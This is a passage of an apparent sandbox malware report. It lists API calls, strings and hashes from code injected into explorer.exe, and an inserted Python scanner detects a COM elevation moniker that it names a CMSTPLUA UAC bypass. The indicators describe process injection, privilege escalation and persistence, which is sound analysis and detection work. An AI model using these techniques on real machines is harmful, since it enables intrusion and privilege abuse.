                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 2183313154-4022980321
                                                                            • Opcode ID: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                            • Instruction ID: e9329548194598a1b921e9e2302e60485edd811e7b3e486cf287bd9c7865158b
                                                                            • Opcode Fuzzy Hash: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                            • Instruction Fuzzy Hash: DE51263630479082EB24DB36A821B9B7351FB8A790F844626EE6943BD5CF3CC64AD704
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$HandleSectionUnmapView$ProcessTerminate
                                                                            • String ID:
                                                                            • API String ID: 4250251239-0
                                                                            • Opcode ID: a53434f1cd64de1ac4a742b2910a49c27e28c7a9365db1277a78b5f9f20ddc51
                                                                            • Instruction ID: edc7f802c72358a5a0b12cc3c71e91b8ddb1074c763173fd38e75fc795826853
                                                                            • Opcode Fuzzy Hash: a53434f1cd64de1ac4a742b2910a49c27e28c7a9365db1277a78b5f9f20ddc51
                                                                            • Instruction Fuzzy Hash: 0F111735518A84C2EB60DF15F8747AEB361F7C8B91F505112DA8E43A28CF7CC489DB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                                                                            • String ID: gfffffff
                                                                            • API String ID: 1282097019-1523873471
                                                                            • Opcode ID: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                                                                            • Instruction ID: 5fff1ccd7d616b0f545b92ce33247ea132b929ce174ca7be1b547e6adad07224
                                                                            • Opcode Fuzzy Hash: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                                                                            • Instruction Fuzzy Hash: 1CA142637147C48BDB01CB2AD6953ED7BA5E7127A8F04C621CF6A0B795E638C695E300
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1789362936-0
                                                                            • Opcode ID: fa37bcbe406a99695d2d22c13647398b81bb9ccce6540e4b2511495a71c7227e
                                                                            • Instruction ID: acd18a779d990f593e2608e6dc8a45fe88261338b174f157da655f563b70e048
                                                                            • Opcode Fuzzy Hash: fa37bcbe406a99695d2d22c13647398b81bb9ccce6540e4b2511495a71c7227e
                                                                            • Instruction Fuzzy Hash: 9821D032218A80C6EB60DB15F89475EB3E1F784765F505325A5AE866E8DF7CC5098B04
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1789362936-0
                                                                            • Opcode ID: 14b3d4f8988eff83989854e1301446e4a54da2a7df46ba258aa51084a2a80777
                                                                            • Instruction ID: 24b33b4b41396de95ba68368deb7a334121a98236a14180604108f26ed61fe24
                                                                            • Opcode Fuzzy Hash: 14b3d4f8988eff83989854e1301446e4a54da2a7df46ba258aa51084a2a80777
                                                                            • Instruction Fuzzy Hash: DB21D032318A80C6EB60DB16F89475A63F1F784765F504325E5AE867E4DF3CC5098B00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 1012874770-0
                                                                            • Opcode ID: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                            • Instruction ID: a0f3d14657f1b413a454a0e812fb6b7ede41cee8c40f104460748707863d0ef0
                                                                            • Opcode Fuzzy Hash: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                            • Instruction Fuzzy Hash: AC81552229154885DF41FFB1C8F52BE2321FBE4F4CF044272AE4D4B5AACEA0C845D390
                                                                            APIs
                                                                            • CreateEventW.KERNEL32 ref: 00BE11DF
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BE1218
                                                                            • CloseHandle.KERNEL32 ref: 00BE157B
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • GetCurrentDirectoryW.KERNEL32 ref: 00BE128D
                                                                            • LocalAlloc.KERNEL32 ref: 00BE12B1
                                                                            • GetModuleHandleW.KERNEL32 ref: 00BE12D5
                                                                            • GetProcAddress.KERNEL32 ref: 00BE12F2
                                                                            • GetProcAddress.KERNEL32 ref: 00BE1312
                                                                            • lstrcpyW.KERNEL32 ref: 00BE133C
                                                                            • lstrcpyW.KERNEL32 ref: 00BE135A
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1379
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1397
                                                                            • lstrcpyW.KERNEL32 ref: 00BE13B6
                                                                            • lstrcpyA.KERNEL32 ref: 00BE13D4
                                                                            • lstrcpyA.KERNEL32 ref: 00BE13F2
                                                                            • lstrcpyA.KERNEL32 ref: 00BE1410
                                                                            • lstrcpyA.KERNEL32 ref: 00BE142E
                                                                            • lstrcpyW.KERNEL32 ref: 00BE144A
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1468
                                                                              • Part of subcall function 00BE7940: GetCurrentProcess.KERNEL32 ref: 00BE795D
                                                                              • Part of subcall function 00BE7940: CreateProcessW.KERNEL32 ref: 00BE7A16
                                                                              • Part of subcall function 00BE7940: NtCreateSection.NTDLL ref: 00BE7A71
                                                                              • Part of subcall function 00BE7940: GetCurrentProcess.KERNEL32 ref: 00BE7AA7
                                                                              • Part of subcall function 00BE7940: NtMapViewOfSection.NTDLL ref: 00BE7AFA
                                                                              • Part of subcall function 00BE7940: NtMapViewOfSection.NTDLL ref: 00BE7B8F
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BE14FD
                                                                            • TerminateProcess.KERNEL32 ref: 00BE1533
                                                                            • CloseHandle.KERNEL32 ref: 00BE1541
                                                                            • CloseHandle.KERNEL32 ref: 00BE154F
                                                                            • LocalFree.KERNEL32 ref: 00BE1568
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$HandleProcess$CloseCreateCurrentSection$AddressDirectoryLocalProcView$AllocEventFreeModuleObjectSingleTerminateWaitWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${6EDD6D74-C007-4E75-B76A-E5740995E24C}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}
                                                                            • API String ID: 3898657461-2375178247
                                                                            • Opcode ID: 5d559f52e9a663e13f135feb56ea1ec1332f638e0a30c25c3a649297af3b307e
                                                                            • Instruction ID: 789497714b42343f14cd19e5228c6b6f7593c6f474c10690d429889d65dd565c
                                                                            • Opcode Fuzzy Hash: 5d559f52e9a663e13f135feb56ea1ec1332f638e0a30c25c3a649297af3b307e
                                                                            • Instruction Fuzzy Hash: 70A12975209B8486FB60CF19E45479A73A2F7C9B90F904626DA8E43B68DF3DC15CCB00
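The function summarised directly above builds, with a run of lstrcpyW/lstrcpyA calls, the strings of a COM elevation moniker ("Elevation:Administrator!new:" followed by the CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}) next to the export names CoGetObject, IIDFromString and LoadLibraryW and the IID {6EDD6D74-C007-4E75-B76A-E5740995E24C}, then hands control to a subroutine that spawns a process and maps a section into it. The scanner below is an added example written by the editor, not code from the report or from the sample: it searches a memory dump for that moniker in both the wide (lstrcpyW) and narrow (lstrcpyA) forms, parses the CLSID that follows it, and names it. The mapping of that CLSID to the auto-elevating CMSTPLUA COM class and of the IID to its ICMLuaUtil interface is the editor's assumption from public documentation of those COM objects, not something the report states, and the sample buffer is constructed.

```python
"""Scan a memory dump for a COM elevation moniker and related COM identifiers.

Added example (editor's code, not from the report). The CLSID/IID names are
the editor's assumption from public documentation of the CMSTPLUA class.
"""
import re

# CLSID of the auto-elevating CMSTPLUA COM class and the IID of its
# ICMLuaUtil interface (editor's assumption, public documentation).
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
ICMLUAUTIL_IID = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}"

MONIKER_PREFIX = "Elevation:Administrator!new:"
GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.IGNORECASE)
GUID_CHARS = 38  # "{" + 36 hex/dash characters + "}"

# lstrcpyW leaves UTF-16LE strings in memory, lstrcpyA leaves narrow ones.
ENCODINGS = ("utf-16-le", "ascii")


def find_elevation_monikers(blob: bytes):
    """Return [(offset, encoding, clsid_or_None)] for every moniker in blob.

    The CLSID directly follows the prefix, so the GUID is read from the bytes
    after the match in the same encoding; a prefix that is not followed by a
    well-formed GUID is still reported (clsid None) rather than dropped.
    """
    hits = []
    for enc in ENCODINGS:
        width = 2 if enc == "utf-16-le" else 1
        needle = MONIKER_PREFIX.encode(enc)
        start = 0
        while (off := blob.find(needle, start)) >= 0:
            end = off + len(needle)
            raw = blob[end:end + GUID_CHARS * width]
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                text = ""
            clsid = text.upper() if GUID_RE.fullmatch(text) else None
            hits.append((off, enc, clsid))
            start = end
    return hits


def contains_string(blob: bytes, s: str) -> bool:
    """True if s is present in blob in either wide or narrow form."""
    return any(s.encode(enc) in blob for enc in ENCODINGS)


def classify(blob: bytes):
    """Turn raw hits into findings a triage analyst can act on."""
    findings = []
    for off, enc, clsid in find_elevation_monikers(blob):
        if clsid == CMSTPLUA_CLSID:
            findings.append(f"CMSTPLUA elevation moniker at 0x{off:X} ({enc}): COM UAC bypass")
        elif clsid:
            findings.append(f"elevation moniker for CLSID {clsid} at 0x{off:X} ({enc})")
        else:
            findings.append(f"elevation moniker prefix without a parseable CLSID at 0x{off:X} ({enc})")
    if contains_string(blob, ICMLUAUTIL_IID):
        findings.append("ICMLuaUtil IID string present")
    if contains_string(blob, "CoGetObject") and contains_string(blob, "IIDFromString"):
        findings.append("CoGetObject + IIDFromString resolved by name (moniker is bound at runtime)")
    return findings


# Constructed sample (not a dump from the report): a few strings laid out the
# way the lstrcpyW / lstrcpyA sequence in the summary would leave them.
SAMPLE = (
    b"\x00" * 16
    + (MONIKER_PREFIX + CMSTPLUA_CLSID).encode("utf-16-le") + b"\x00\x00"
    + b"CoGetObject\x00IIDFromString\x00"
    + ICMLUAUTIL_IID.encode("utf-16-le") + b"\x00\x00"
    + "%s\\explorer.exe".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    for line in classify(SAMPLE):
        print(line)
```

Run it against a real .sdmp file by reading the file as bytes and passing it to classify(); the offsets it prints are relative to the start of the dump, so add the dump's base (00BE0000 for the source file listed above) to compare them with the xrefs in this report.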
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BF5204
                                                                            • RegCreateKeyExW.ADVAPI32 ref: 00BF5351
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5410
                                                                            • _LDint.LIBCPMTD ref: 00BF557C
                                                                            • _LDint.LIBCPMTD ref: 00BF55B1
                                                                            • CreateFileW.KERNEL32 ref: 00BF5614
                                                                            • WriteFile.KERNEL32 ref: 00BF565A
                                                                            • RegCloseKey.ADVAPI32 ref: 00BF5903
                                                                            • LocalFree.KERNEL32 ref: 00BF591C
                                                                            • LocalFree.KERNEL32 ref: 00BF5935
                                                                            • LocalFree.KERNEL32 ref: 00BF594E
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • shutdown.WS2_32 ref: 00BF5975
                                                                            • closesocket.WS2_32 ref: 00BF5980
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalTimer$Free$ChangeConcurrency::details::platform::__CreateDintFileQueue$AllocCloseWrite_errno_invalid_parameter_noinfoclosesocketsetsockoptshutdown
                                                                            • String ID: ?$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 2583228562-589786118
                                                                            • Opcode ID: 04720dedddbbfc74f2b7b11cc4c88cef06d10f380cd3efded139e3232de76a69
                                                                            • Instruction ID: 2e86983cfd5b44c7e997473b65498f1e5d107154d422c288a8866a1f1a07d21c
                                                                            • Opcode Fuzzy Hash: 04720dedddbbfc74f2b7b11cc4c88cef06d10f380cd3efded139e3232de76a69
                                                                            • Instruction Fuzzy Hash: 0012B736218FC4C6D7719B15E4947AAB3A5F388764F504226D7EE83B98DF78C589CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                            • API String ID: 2643518689-564504941
                                                                            • Opcode ID: d37108003cac474a8c701e83636fc616b018a3e7b56aac5cdfc92d5c433599e0
                                                                            • Instruction ID: c2281aa957e1387307872fcc874908aa0f3efd92b91ccd8a5db12893884f7f2e
                                                                            • Opcode Fuzzy Hash: d37108003cac474a8c701e83636fc616b018a3e7b56aac5cdfc92d5c433599e0
                                                                            • Instruction Fuzzy Hash: 33514D34306B4585FE19DB52B864BA923A4FB4AB90F8806259D2E47771EF3CC59AE300
                                                                            APIs
                                                                            Strings
                                                                            • {C2479B37-C2B3-42BB-AA73-3313D48DF29B}, xrefs: 00BF0432
                                                                            • %s\%s, xrefs: 00BF0446
                                                                            • {E83187BB-7111-445B-879E-34A213BF001C}, xrefs: 00BF0566
                                                                            • {16B194B1-19CC-4C52-92E2-1BFAC8473D8C}, xrefs: 00BF0343
                                                                            • {8931AB7A-A1AA-4E58-80EA-2B1247F36722}, xrefs: 00BF0392
                                                                            • Software\%s, xrefs: 00BF056D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWaitlstrlenwnsprintf
                                                                            • String ID: %s\%s$Software\%s${16B194B1-19CC-4C52-92E2-1BFAC8473D8C}${8931AB7A-A1AA-4E58-80EA-2B1247F36722}${C2479B37-C2B3-42BB-AA73-3313D48DF29B}${E83187BB-7111-445B-879E-34A213BF001C}
                                                                            • API String ID: 896765885-521004812
                                                                            • Opcode ID: 2b88cd6d77688c10a737e252b3dd4611e94d1061b44b1b070ff6bb6cfe9abd3a
                                                                            • Instruction ID: c0e422346c3156bf7671d306fb96216d888c6a96555a250023b9bfc4855b89df
                                                                            • Opcode Fuzzy Hash: 2b88cd6d77688c10a737e252b3dd4611e94d1061b44b1b070ff6bb6cfe9abd3a
                                                                            • Instruction Fuzzy Hash: F851FA35218AC5C2E770EB15E8647AE73E5FBC8754F508225D6CA83AA8DF7CC549CB80
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$Path$AllocFolderKnownTask$DintDirectoryTempWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                                                                            • API String ID: 4190533178-4258658051
                                                                            • Opcode ID: 3e354cff4670192f7f0aa3ba0ac307336d0a7c352c9ceb26a1ae8157155194bc
                                                                            • Instruction ID: ae9054be6fa168061d5cfa77f82d61ffddaf8c767583e4c028376adacc1bb195
                                                                            • Opcode Fuzzy Hash: 3e354cff4670192f7f0aa3ba0ac307336d0a7c352c9ceb26a1ae8157155194bc
                                                                            • Instruction Fuzzy Hash: BAC1E872218AC5D6EB70DB14E8987AAB3A0F7C5B45F504226D68E47BB8DF3CC549CB04
                                                                            APIs
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF88C
                                                                            • LocalFree.KERNEL32 ref: 00BEFA3D
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF8D4
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BEF8F8
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEF910
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF928
                                                                            • CreateProcessW.KERNEL32 ref: 00BEF9D9
                                                                            • LocalFree.KERNEL32 ref: 00BEF9E9
                                                                            • LocalFree.KERNEL32 ref: 00BEF9F4
                                                                            • LocalFree.KERNEL32 ref: 00BEF9FF
                                                                            • LocalFree.KERNEL32 ref: 00BEFA0A
                                                                            • LocalFree.KERNEL32 ref: 00BEFA1C
                                                                            • LocalFree.KERNEL32 ref: 00BEFA27
                                                                            • LocalFree.KERNEL32 ref: 00BEFA32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
• String ID: "%s%s" %s$%s%s$WindowsServer2024.exe$h${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}
• API String ID: 2909854553-1761902030
• Opcode ID: 6941620c8b1b6a3f7695d2f46255491dd9ec483a90c569c830939d92bb6a245d
• Instruction ID: 73d7dfcbd8b6856e484dc7e7a58f5beff3be0f9bfa08a828d73371d0e2be641e
• Opcode Fuzzy Hash: 6941620c8b1b6a3f7695d2f46255491dd9ec483a90c569c830939d92bb6a245d
• Instruction Fuzzy Hash: D251B632618B8182EB209B65F86476EB7A1F7C4794F501235EA8E47BB8DF7CD549CB00
APIs
  • Part of subcall function 00C0845C: RtlLookupFunctionEntry.KERNEL32 ref: 00C084D0
• __GetUnwindTryBlock.LIBCMT ref: 00C0BAF8
• __SetUnwindTryBlock.LIBCMT ref: 00C0BB1F
  • Part of subcall function 00C08E6C: RaiseException.KERNEL32 ref: 00C08EE7
• __GetUnwindTryBlock.LIBCMT ref: 00C0BB29
• _getptd.LIBCMT ref: 00C0BB7F
• _getptd.LIBCMT ref: 00C0BB92
• _getptd.LIBCMT ref: 00C0BB9E
• _SetThrowImageBase.LIBCMT ref: 00C0BBB2
• _getptd.LIBCMT ref: 00C0BC02
• _getptd.LIBCMT ref: 00C0BC15
• _getptd.LIBCMT ref: 00C0BC21
